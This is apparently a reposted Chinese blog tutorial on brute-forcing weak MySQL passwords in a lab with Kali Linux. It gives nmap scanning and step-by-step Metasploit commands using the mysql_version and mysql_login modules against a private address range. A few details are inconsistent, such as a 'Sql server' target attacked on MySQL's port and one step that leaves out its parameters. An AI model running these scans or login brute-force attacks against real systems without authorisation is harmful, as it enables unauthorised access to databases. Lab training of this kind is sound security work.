课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。那么如何利用Metasploit(msf)进行Mysql弱口令爆破呢?接下来让我们一起学习!
二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.搭建好Sql server的靶机一个;
3.整装待发的小白一个。
三、战略安排
3.1 设置受害者靶机跟***者主机的网络模式为NAT模式,如下图所示。
3.2 查看受害者主机的IP地址,如下图所示。
命令:ifconfig
3.3 针对目标受害者主机进行信息收集,如下图所示。
命令:nmap -sV IP
例子:nmap -sV 192.168.126.170-200
3.4 扫描结果如下图所示,目标***者主机开启了3306危险端口。
3.5 利用Metasploit(msf)***框架对目标主机进行信息收集,如下图所示。
命令:msfconsole
3.6 利用msf检索SQL相关***模块,如下图所示。
命令:search mysql_version
3.7 利用检索到的漏洞利用模块,如下图所示。
命令:use auxiliary/scanner/mysql/mysql_version
3.8 查看相关参数,如下图所示。
命令:show options
3.9 设置参数,如下图所示。
命令:set rhosts 192.168.126.170-200
命令:set threads 50
3.10 运行***模块,如下图所示。
命令:run
3.11 返回上层目录,如下图所示。
命令:back
3.12 检索数据库***模块,如下图所示。
命令:search mysql_login
3.13 利用检索到的***模块,如下图所示。
命令:use auxiliary/scanner/mysql/mysql_login
3.14 查看相关参数,如下图所示。
命令:show options
3.15 设置相关参数,如下图所示。
3.16 设置好参数进行***,如下图所示。
命令:run
辛苦原创,你的每一次评论点赞和关注,都是我们源源不断的创作动力哦!你也可搜索:Kali 与编程,学习更多 Kali Linux ***与白帽编程技巧呢!
点我学习更多Kali Linux***测试与网络***实战技巧!
来源:oschina
链接:https://my.oschina.net/u/4325464/blog/4686773